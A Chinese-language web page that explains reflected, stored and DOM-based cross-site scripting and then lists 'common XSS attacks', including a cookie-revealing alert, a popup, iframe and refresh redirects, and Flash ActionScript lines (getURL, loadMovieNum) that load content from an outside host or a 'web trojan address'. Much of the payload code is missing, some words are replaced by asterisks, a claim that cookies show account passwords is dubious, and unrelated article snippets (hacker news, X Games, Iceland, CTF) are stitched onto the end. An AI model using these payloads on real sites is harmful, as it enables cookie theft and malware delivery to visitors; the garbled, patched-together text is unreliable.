一、什么是XSS?
XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。
二、XSS分类
XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS
反射型XSS
发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。
存储型XSS
存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码
最典型的例子是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言的内容会从数据库查询出来并显示,浏览器发现有XSS代码,就当做正常的HTML与Js解析执行,于是触发了XSS攻击。
DOM XSS
DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情。
附常见的XSS攻击 ***
1、这个应该都知道
常用于测试 是否存在跨站
2、
这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和密码。
3、,当用户浏览该 页时,将弹出壹个高爲200,宽爲200的网页窗口,在其中打开的页面是http://www.pete.cn/default.asp
4、跨站攻击的形式是多样的,不仅可以在网页中插入跨站脚本代码,而且可以在flash文件中插入跨站脚本代码,实现跨站攻击。由于flash文件有较高 的安全性,用户通常对flash文件的警惕性不够,因此用flash文件进行跨站攻击的成功率很高。如果将这个含有跨站脚本代码的flash文件插入到网 页中,例如 *** 成网页banner或者广告,那么中招的用户将更多。
flash跨站是通过在flash文件中插入动作脚本来实现的,通过在flash文件“帧”的“动作”中插入跨站脚本代码来实现跨站攻击,其实现 *** 入下:
首先运行flash文件 *** 工具flash8.exe,新建壹个空白的flash文档。然后选中其中的第壹帧,进入界面下方的“动作”编辑界面,在Action Script中插入我们的跨站脚本代码
getURL(http://网页木马地址, _blank, GET);
loadMovieNum(http://www.pete.cn/test.swf, 0);
5、< iframe>
这就是 传说中的框架 - - 膜拜吧 还有 *** 也可以使用,比框架更隐蔽
6、Refresh到另壹个页面:
1 |
本文目录一览: 1、历史上最著名的几次黑客事件 2、为什么俄罗斯黑客这么厉害 3、killnet黑客是哪个国家的 4、俄罗斯黑客超级厉害,为什么整体IT业却不发达? 5、网络世界的黑客...
本文目录一览: 1、下载什么软件才能进入黑客网站oppoa3手机 2、介绍些下载软件的网站 3、黑客软件如何下载 4、哪位大哥知道中国最大的最有实力的黑客网是哪个 下载什么软件才能进入黑...
临近2020年末,该以怎样的仪式感,为这个特别的年份做一个ending? 和X Games一起,在2020的末尾“滑团火”!用滑板击碎冷冬,给2020一个漂亮的...
天津市滨海新区派出所有一批特警队,她们像医师一样守护着公安人员互联网的安全性,而网络黑客,为公安人员互联网创建了强劲的人体免疫系统和疾病控制监管,确诊...
太空旅客、普罗米修斯、冰与火之歌、白日梦想家......诸多好莱坞大片挑选冰岛做为采景地,恰好是因为它得天独厚的地理环境和地貌特征。 乃至能够故作外星或者末日。 可能是被欠佳新闻媒体、欠佳...
图15 GFSK解调脚本作业图历来CTF是很简略出乱子的,有时分乱子来自于本身,比方某年的XDCTF由于校园机房停电导致初赛停顿了几个小时。 当然,更多的乱子来自于“黑客”。 由于CTF是安全相关的竞...